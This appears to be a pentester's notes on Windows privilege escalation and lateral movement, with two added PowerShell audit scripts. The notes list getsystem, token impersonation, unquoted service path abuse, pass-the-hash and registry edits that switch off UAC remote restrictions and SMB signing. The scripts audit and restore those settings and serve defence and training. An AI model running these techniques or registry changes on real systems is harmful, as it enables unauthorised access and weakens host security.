NOTE: These are just commands I refer back to when doing a pentest. Nothing technical here.

Stable Shell:

  1. For Windows, use the Meterpreter migrate command to move the shell into another process.

  2. Better to have SYSTEM privileges, so that we can migrate into a SYSTEM process.

    1. meterpreter: getsystem
    2. meterpreter: getuid
    3. UACMe - bypass UAC (User Account Control)
    4. WinPEAS.exe
    5. PowerUp.ps1
    6. Check privileges: in cmd, whoami /priv; in Meterpreter, run win_privs
  3. Token impersonation - Incognito, Juicy Potato, Rotten Potato.

    1. meterpreter: load incognito
    2. impersonate_token [user]
    3. getuid

Unquoted service path:

  1. Find a service running with SYSTEM privileges:
    1. wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
    2. Or use the trusted_service_path module in MSF.
  2. Check whether the service's binary path is unquoted:
    1. sc qc [SERVICE]
  3. Replace the payload.
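Added PowerShell audit script, not part of these notes, that does the same check as the wmic one-liner above from the defender's side: it lists services whose binary path is unquoted and contains a space, marks the auto-start SYSTEM ones outside the Windows directory as high risk, and emits the quoted path that should be written back so the condition goes away. It assumes PowerShell 5.1 or later with the CIM cmdlets and an elevated session so every service is visible; the function names and the risk labels are my own.

```powershell
# Added audit script (not from the original notes). Finds services whose ImagePath is
# unquoted and contains a space, the same condition the wmic/findstr pipeline above hunts for.
# Assumes PowerShell 5.1+ with Get-CimInstance; run elevated to see all services.

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        # Already quoted, or no path at all (kernel drivers, some svchost entries): nothing to do.
        if (-not $path -or $path.StartsWith('"')) { return }
        # Only the part up to the executable matters; arguments after it may legitimately contain spaces.
        $exe = if ($path -match '^(.*?\.exe)') { $Matches[1] } else { $path }
        if ($exe -notmatch '\s') { return }
        [pscustomobject]@{
            Name        = $_.Name
            StartMode   = $_.StartMode
            RunsAs      = $_.StartName
            Path        = $path
            InSystemDir = $exe -like "$env:SystemRoot\*"
            # Remediation value: quote the executable, keep any trailing arguments untouched.
            QuotedPath  = '"{0}"{1}' -f $exe, $path.Substring($exe.Length)
        }
    }
}

function Invoke-UnquotedServicePathAudit {
    [CmdletBinding()]
    param()
    foreach ($svc in Get-UnquotedServicePath) {
        # Auto-start + LocalSystem + outside %SystemRoot% is the combination the notes above look for.
        $risk = if ($svc.StartMode -eq 'Auto' -and $svc.RunsAs -eq 'LocalSystem' -and -not $svc.InSystemDir) {
            'HIGH'
        } else {
            'review'
        }
        [pscustomobject]@{
            Risk       = $risk
            Service    = $svc.Name
            StartMode  = $svc.StartMode
            RunsAs     = $svc.RunsAs
            Path       = $svc.Path
            FixWith    = "sc config $($svc.Name) binPath= $($svc.QuotedPath)"
        }
    }
}

Invoke-UnquotedServicePathAudit | Format-Table -AutoSize -Wrap
```

The script reports rather than rewrites so the quoted value can be reviewed first; the FixWith column is the sc.exe syntax matching the sc qc check in the notes, and the binPath= value must keep the inner quotes when it is applied.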

Look for persistence:

  1. Dump the hashes. NOTE: you may need at least Administrator privileges to dump the hashes.
  2. Pass the hash: psexec, smbexec, wmiexec, Meterpreter. NOTE: sometimes membership in the local Administrators group is not enough. This typically presents itself when trying to pass-the-hash with an account that isn't the actual built-in Administrator (RID 500) but rather one that is merely a member of the Administrators group.
  3. If we get an error like STATUS_ACCESS_DENIED (Commands=117 WordCount=0), this is a good indication that registry changes may be required on the target machine.
  4. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - add a new DWORD named LocalAccountTokenFilterPolicy and set its value to 1.
  5. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters - add a new DWORD named RequireSecuritySignature and set its value to 0.
  6. Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
  7. ... same as above, but for RequireSecuritySignature.
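Added PowerShell check, not part of these notes, that reads the two registry values the steps above change and reports whether a host currently carries the weakened settings (LocalAccountTokenFilterPolicy = 1 turns off UAC remote restrictions for non-RID-500 local admins; RequireSecuritySignature = 0 means the SMB server does not require signing). The key paths and value names are the ones from the notes; the hardened values are the Windows defaults (LocalAccountTokenFilterPolicy absent or 0, RequireSecuritySignature 1). The -Harden switch, the function names and the status labels are my own, and the script assumes an elevated PowerShell 5.1 or later session.

```powershell
# Added defender check (not from the original notes). Reports the two registry values the
# pass-the-hash steps above modify and optionally restores the hardened values.
# Assumes PowerShell 5.1+ running elevated; key paths and value names come from the notes.
param([switch]$Harden)

$checks = @(
    @{
        Key      = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
        Name     = 'LocalAccountTokenFilterPolicy'
        Weak     = 1
        Hardened = 0
        Note     = '1 disables UAC remote restrictions: any local admin (not just RID 500) gets a full token over the network'
    }
    @{
        Key      = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
        Name     = 'RequireSecuritySignature'
        Weak     = 0
        Hardened = 1
        Note     = '0 means the SMB server accepts unsigned sessions (the default on member workstations, but not the hardened state)'
    }
)

function Get-RegistryValueOrNull {
    param([string]$Key, [string]$Name)
    # Get-ItemProperty throws on a missing key or value; treat both as "not set".
    $item = Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Invoke-PthRegistryAudit {
    param([switch]$Harden)
    foreach ($c in $checks) {
        $current = Get-RegistryValueOrNull -Key $c.Key -Name $c.Name
        $status = if ($null -eq $current) {
            'not set (default)'
        } elseif ([int]$current -eq $c.Weak) {
            'WEAK'
        } else {
            'ok'
        }
        if ($Harden -and $status -eq 'WEAK') {
            # Same cmdlet the notes use to weaken the host, here writing the hardened value back.
            Set-ItemProperty -Path $c.Key -Name $c.Name -Value $c.Hardened -Type DWord
            $status = "WEAK -> set to $($c.Hardened)"
        }
        [pscustomobject]@{
            Setting = $c.Name
            Key     = $c.Key
            Current = $current
            Status  = $status
            Note    = $c.Note
        }
    }
}

Invoke-PthRegistryAudit -Harden:$Harden | Format-List
```

Run it without the switch first; RequireSecuritySignature = 0 cannot be distinguished from the workstation default by reading the value alone, so a WEAK result there is a policy finding rather than proof that someone changed it, whereas LocalAccountTokenFilterPolicy = 1 is never the default and is worth investigating on its own.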